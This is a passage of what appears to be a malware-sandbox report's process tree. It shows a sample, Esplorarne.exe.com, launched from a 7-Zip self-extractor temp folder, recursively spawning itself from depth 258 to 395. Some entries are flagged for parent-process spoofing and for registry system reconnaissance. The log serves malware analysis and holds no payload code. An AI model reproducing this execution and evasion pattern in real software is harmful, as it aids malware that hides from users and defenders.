        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        258⤵
        
        PID:5628
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        259⤵
        
        PID:2628
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        260⤵
        
        PID:8024
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        261⤵
        
        PID:6960
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        262⤵
        
        PID:6832
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        263⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        
        PID:6148
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        264⤵
        
        PID:940
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        265⤵
        
        PID:5624
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        266⤵
        
        PID:5756
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        267⤵
        
        PID:2812
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        268⤵
        
        PID:7624
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        269⤵
        
        PID:5396
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        270⤵
        
        PID:7868
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        271⤵
        
        PID:6312
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        272⤵
        
        PID:7704
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        273⤵
        
        PID:5156
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        274⤵
        
        PID:3172
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        275⤵
        
        PID:5916
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        276⤵
        
        PID:3128
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        277⤵
        
        PID:1036
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        278⤵
        
        PID:5648
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        279⤵
        
        PID:4852
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        280⤵
        
        PID:6292
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        281⤵
        
        PID:7436
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        282⤵
        
        PID:6588
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        283⤵
        
        PID:7460
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        284⤵
        
        PID:4864
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        285⤵
        
        PID:6796
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        286⤵
        
        PID:5580
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        287⤵
        
        PID:6564
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        288⤵
        
        PID:3312
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        289⤵
        
        PID:1908
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        290⤵
        
        PID:7340
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        291⤵
        
        PID:1504
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        292⤵
        
        PID:5388
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        293⤵
        
        PID:7288
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        294⤵
        
        PID:6792
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        295⤵
        
        PID:4360
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        296⤵
        
        PID:888
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        297⤵
        
        PID:1564
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        298⤵
        
        PID:1120
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        299⤵
        
        PID:6684
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        300⤵
        
        PID:3204
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        301⤵
        
        PID:3692
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        302⤵
        
        PID:7804
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        303⤵
        
        PID:7268
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        304⤵
        
        PID:8060
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        305⤵
        
        PID:948
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        306⤵
        
        PID:6800
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        307⤵
        
        PID:5212
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        308⤵
        
        PID:1672
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        309⤵
        
        PID:3992
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        310⤵
        
        PID:8140
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        311⤵
        
        PID:3544
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        312⤵
        
        PID:2504
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        313⤵
        
        PID:7228
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        314⤵
        
        PID:6268
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        315⤵
        
        PID:3296
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        316⤵
        
        PID:3580
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        317⤵
        
        PID:1068
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        318⤵
        
        PID:6240
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        319⤵
        
        PID:1496
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        320⤵
        
        PID:7824
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        321⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        
        PID:6548
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        322⤵
        
        PID:2432
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        323⤵
        
        PID:7616
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        324⤵
        
        PID:2888
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        325⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        
        PID:5968
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        326⤵
        
        PID:5412
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        327⤵
        
        PID:5660
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        328⤵
        
        PID:5836
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        329⤵
        
        PID:6880
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        330⤵
        
        PID:4572
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        331⤵
        
        PID:4524
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        332⤵
        
        PID:1392
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        333⤵
        
        PID:4588
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        334⤵
        
        PID:2376
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        335⤵
        
        PID:8172
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        336⤵
        
        PID:3392
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        337⤵
        
        PID:8040
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        338⤵
        
        PID:2176
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        339⤵
        
        PID:2548
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        340⤵
        
        PID:6612
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        341⤵
        
        PID:7888
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        342⤵
        
        PID:2876
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        343⤵
        
        PID:6028
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        344⤵
        
        PID:7452
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        345⤵
        
        PID:5176
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        346⤵
        
        PID:6004
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        347⤵
        
        PID:7112
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        348⤵
        
        PID:2948
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        349⤵
        
        PID:3800
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        350⤵
        
        PID:2044
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        351⤵
        
        PID:5300
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        352⤵
        
        PID:2824
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        353⤵
        
        PID:7652
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        354⤵
        
        PID:1372
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        355⤵
        
        PID:6336
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        356⤵
        
        PID:2520
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        357⤵
        
        PID:6648
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        358⤵
        
        PID:1972
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        359⤵
        
        PID:4000
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        360⤵
        
        PID:5788
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        361⤵
        
        PID:2976
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        362⤵
        
        PID:5200
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        363⤵
        
        PID:4556
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        364⤵
        
        PID:7880
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        365⤵
        
        PID:6956
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        366⤵
        
        PID:4624
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        367⤵
        
        PID:5764
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        368⤵
        
        PID:680
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        369⤵
        
        PID:5544
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        370⤵
        
        PID:6024
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        371⤵
        
        PID:5272
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        372⤵
        
        PID:7840
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        373⤵
        
        PID:1944
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        374⤵
        
        PID:3672
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        375⤵
        
        PID:4340
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        376⤵
        
        PID:1148
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        377⤵
        
        PID:4312
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        378⤵
        
        PID:3968
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        379⤵
        
        PID:6824
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        380⤵
        
        PID:2300
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        381⤵
        
        PID:4100
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        382⤵
        
        PID:6060
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        383⤵
        
        PID:3964
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        384⤵
        
        PID:1852
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        385⤵
        
        PID:2560
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        386⤵
        
        PID:7816
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        387⤵
        
        PID:3244
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        388⤵
        
        PID:6796
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        389⤵
        
        PID:5580
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        390⤵
        
        PID:6728
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        391⤵
        
        PID:8084
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        392⤵
        
        PID:6972
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        393⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5128
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        394⤵
        
        PID:7056
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
        395⤵
        
        PID:7288
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
